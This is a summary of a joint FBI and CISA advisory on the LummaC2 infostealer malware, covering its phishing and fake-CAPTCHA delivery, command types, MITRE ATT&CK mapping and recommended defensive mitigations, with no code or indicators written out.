The FBI and the Cybersecurity and Infrastructure Security Agency (CISA) have released a joint advisory concerning the LummaC2 information stealer (infostealer) malware. This malware poses significant risks by infiltrating computer networks to exfiltrate sensitive information from individuals and organizations, particularly affecting sectors critical to U.S. infrastructure. Observations of LummaC2 activities were made as recently as May 2025, with indicators of compromise (IOCs) noted from November 2023 to May 2025.
Overview
LummaC2 first surfaced on Russian cybercriminal forums in 2022, commonly deployed through spearphishing tactics involving malicious hyperlinks and attachments. Unsuspecting users are tricked into executing the malware via a deceptive CAPTCHA that instructs them to input commands that trigger PowerShell scripts. To evade detection, LummaC2 is often embedded within counterfeit software, rendering conventional cybersecurity responses ineffective.
Upon installation, LummaC2 can stealthily gather sensitive user information like personally identifiable information, financial data, and MFA details. A notable increase in the market for LummaC2 logs was reported, with over 21,000 listings from April to June 2024.
Technical Insights
The LummaC2 executable initiates with a main routine consisting of several sub-routines designed to establish communication with command and control (C2) servers, collect user and computer-specific data, and execute theft operations. The malware avoids creating files on infected systems, operating entirely in memory while gathering and sending information to the C2 server.
Key command types identified include:
- Opcode 0 – Generic Data Theft: Allows customizable fields for data collection.
- Opcode 1 & 2 – Browser Data Theft: Targeted commands for stealing data from various browsers (excluding Mozilla).
- Opcode 3 – Remote File Download: Facilitates downloading and executing files.
- Screenshot Capture Command: Can take screenshots and upload them.
- Self-Deletion Command: Deletes itself upon specific conditions.
Indicators of Compromise (IOCs)
A list of IOCs was compiled, including several executable hashes, DLL binaries, and domains serving the LummaC2 malware. Examples include hashes for multiple LummaC2 executables and various malicious domains associated with its activities. Organizations are discouraged from taking action against these domains without thorough investigation.
MITRE ATT&CK Framework Alignment
The advisory employs the MITRE ATT&CK Matrix, mapping LummaC2’s behavior to specific techniques, including:
- Initial Access: Phishing campaigns delivering the malware.
- Defense Evasion: Obfuscation tactics to bypass detection.
- Discovery: Gathering detailed user information.
- Collection: Automating data retrieval processes.
- Command and Control: Various post-exploit communication techniques.
- Exfiltration: Transferring collected data back to threat actors undetected.
Recommended Mitigations
The FBI and CISA strongly recommend organizations adopt specific measures to diminish risks from LummaC2, which align with the Cross-Sector Cybersecurity Performance Goals. Key measures include:
- User Account Separation: Limit access and permissions based on roles.
- Monitoring Behavior: Detect anomalies through logs and process monitoring.
- Application Controls: Enforce strict controls over software execution.
- Phishing Defense: Apply multifactor authentication and security training.
- Regular Updates: Keep systems patched to minimize vulnerabilities.
- Network Segmentation: Isolate sensitive data to limit exposure.
Organizations are encouraged to continually test their security protocols against tactics identified in the advisory to ensure preparedness against future threats.
Reporting Protocol
While there’s no obligation for organizations to report to the FBI and CISA, any willing parties can share information regarding the status, scope, and specifics of infections to enhance communal cybersecurity efforts.
This advisory serves as a crucial resource for understanding the LummaC2 malware threat and implementing effective defensive measures to safeguard data integrity across critical infrastructure sectors.